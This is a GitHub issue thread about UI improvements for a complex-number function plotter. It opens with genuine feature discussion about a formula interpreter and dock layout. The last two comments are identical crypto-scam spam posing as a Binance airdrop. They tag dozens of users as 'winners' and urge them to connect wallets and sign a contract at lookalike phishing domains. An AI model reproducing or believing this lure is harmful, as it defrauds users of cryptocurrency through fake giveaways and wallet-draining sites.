### ISSUE TITLE
improve ui

### ISSUE THREAD

**Issue by bbuecherl** [benjaminaaron/ComplexNumberFunctionPlotter#4]

**Comment by benjaminaaron** [comment]
An Interpreter for the formula input field would be nice :) so that one can write c^2 / (1 + 2i) for instance.

**Comment by bbuecherl** [comment]
yes and define (multiple) "helper" functions so you can write recursive plots

**Comment by benjaminaaron** [comment]
I put it on the left side now because it would grow too wide... but maybe two rows on top is better? How about a hide/show-dock function?

**Comment by Przemocny** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://giveway.binancbnbrewards.online/4JhoUO)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://giveway.binancbnbrewards.online/4JhoUO) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @hoangngocb00, @vanshika-srivastava, @albertovasquez, @mistressxalexis, @rpplusplus, @ldkfreetoplay, @taught1, @longcpp, @LakoMoor, @LeeShan198, @priom, @tsdl2018, @vinch, @ayifttt, @demondayza, @anthony0998, @zachary124, @0xforkitall, @kingwill3, @prite36, @valli0x, @kakashi0x0, @gerroon, @windswrold, @ibrahimarslann59, @Maxvyr, @velichko-artem, @PeterCore, @BeardedBaker, @syed1ahmed, @unsystematic1976wyn, @Gifthelenasp, @kihonyoo, @ckirejevas, @stephdgenius, @kristiehuang, @angelcheung22, @kaichen, @camchis, @irisduld1986, @CaoThien96, @mentoer, @piaoye007, @Daolen123, @Farshid962424, @DoctorrCryptoo, @Luanxing, @Thinker024, @sehee-dev, @moinulmoin

**Comment by oninn** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @LydusDev, @idontveapc, @Sharon6666666, @ICLXL, @yhm-amber, @Chonwai, @saul-atomrigs
